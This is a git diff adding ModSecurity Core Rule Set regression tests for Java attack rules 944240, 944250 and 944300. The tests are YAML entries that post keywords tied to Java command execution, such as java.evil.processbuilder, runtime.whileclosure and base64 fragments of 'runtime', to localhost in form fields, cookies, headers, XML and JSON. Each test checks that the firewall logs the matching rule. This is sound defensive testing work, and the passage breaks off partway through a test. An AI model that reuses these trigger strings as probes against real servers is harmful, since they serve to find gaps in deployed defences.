+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.whileclosure"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-85
+ desc: "Content-Type text/plain includes keyword runtime.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=runtime.whileclosure"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-86
+ desc: "Content-Type application/json arg value includes keyword runtime.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"runtime.whileclosure\"}"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-87
+ desc: "Content-Type application/json arg name includes keyword runtime.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"runtime.whileclosure\": \"test\"}"
+ output:
+ log_contains: "id \"944240\""
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
new file mode 100644
index 000000000..eedd259ac
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
@@ -0,0 +1,453 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944250.yaml" + description: "Positive tests for rule 944250" +tests: + - test_title: 944250-0 + desc: "Argument test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-1 + desc: "Argument name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-2 + desc: "Cookie test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + 
log_contains: "id \"944250\"" + - test_title: 944250-3 + desc: "Cookie name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-4 + desc: "Request header test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-5 + desc: "XML attribute value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-6 + desc: "XML element value includes keyword java.evil.runtime" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-7 + desc: "Nested XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-8 + desc: "Content-Type text/plain includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-9 + desc: "Content-Type application/json arg value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-10 + desc: "Content-Type application/json arg name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-11 + desc: "Argument test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-12 + desc: "Argument name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-13 + desc: "Cookie test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-14 + desc: "Cookie name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-15 + desc: "Request header test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 
+ Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-16 + desc: "XML attribute value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-17 + desc: "XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-18 + desc: "Nested XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: 
"POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-19 + desc: "Content-Type text/plain includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-20 + desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-21 + desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + 
output: + log_contains: "id \"944250\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml new file mode 100644 index 000000000..d9f3fa329 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml 
@@ -0,0 +1,6697 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944300.yaml" + description: "Positive tests for rule 944300" +tests: + - test_title: 944300-0 + desc: "Argument test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-1 + desc: "Argument name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-2 + desc: "Cookie test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - 
test_title: 944300-3 + desc: "Cookie name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-4 + desc: "Request header test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-5 + desc: "XML attribute value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-6 + desc: "XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-7 + desc: "Nested XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-8 + desc: "Content-Type text/plain includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-9 + desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-10 + desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-11 + desc: "Argument test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-12 + desc: "Argument name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: 
"POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-13 + desc: "Cookie test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-14 + desc: "Cookie name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-15 + desc: "Request header test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 
944300-16 + desc: "XML attribute value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-17 + desc: "XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-18 + desc: "Nested XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 